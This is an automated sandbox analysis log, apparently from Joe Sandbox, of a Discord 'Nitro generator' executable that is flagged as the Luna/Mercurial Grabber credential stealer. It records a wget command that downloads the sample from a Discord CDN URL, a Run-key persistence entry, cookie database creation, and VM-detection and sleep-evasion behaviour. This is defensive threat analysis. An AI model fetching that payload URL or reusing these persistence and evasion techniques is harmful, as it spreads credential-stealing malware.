Source: 17.0.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 6.0.NitroGenV0.5.exe.8e0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 17.2.NitroGenV0.5.exe.510000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe, type: DROPPED Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe, type: DROPPED Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Detected potential crypto function
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BB61F6 6_2_00007FFC08BB61F6
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BBBD99 6_2_00007FFC08BBBD99
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Code function: 6_2_00007FFC08BB6FA2 6_2_00007FFC08BB6FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC08936FA2 17_2_00007FFC08936FA2
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC0893BD99 17_2_00007FFC0893BD99
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC089361F6 17_2_00007FFC089361F6
PE file contains strange resources
Source: NitroGenV0.5.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NitroGenV0.5.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\wget.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe"
Source: unknown Process created: C:\Users\user\Desktop\download\NitroGenV0.5.exe "C:\Users\user\Desktop\download\NitroGenV0.5.exe"
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe "C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe"
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe" Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\Desktop\cmdline.out Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File created: C:\Users\user\AppData\Local\Temp\cookies.db Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.win@8/11@7/5
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: https://cdn.discordapp.com/attachments/755518735111946330/904812165368774656/NitroGenV0.5.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_01
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\wget.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Unpacked PE file: 6.2.NitroGenV0.5.exe.8e0000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Unpacked PE file: 17.2.NitroGenV0.5.exe.510000.0.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009F29B6 pushfd ; ret 4_2_009F2CF2
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009EC354 push eax; ret 4_2_009EC355
Source: C:\Windows\SysWOW64\wget.exe Code function: 4_2_009EC350 push eax; ret 4_2_009EC351
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Code function: 17_2_00007FFC08930443 pushad ; ret 17_2_00007FFC08930451

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe File created: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Jump to dropped file
Source: C:\Windows\SysWOW64\wget.exe File created: C:\Users\user\Desktop\download\NitroGenV0.5.exe Jump to dropped file
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mercurial Grabber Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98796s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -98684s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6416 Thread sleep time: -99892s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 6412 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\download\NitroGenV0.5.exe TID: 1744 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99765s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99642s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99500s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99391s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99281s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99063s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98922s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98813s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -98642s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99906s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NitroGenV0.5.exe TID: 6940 Thread sleep time: -99797s >= -30000s Jump to behavior
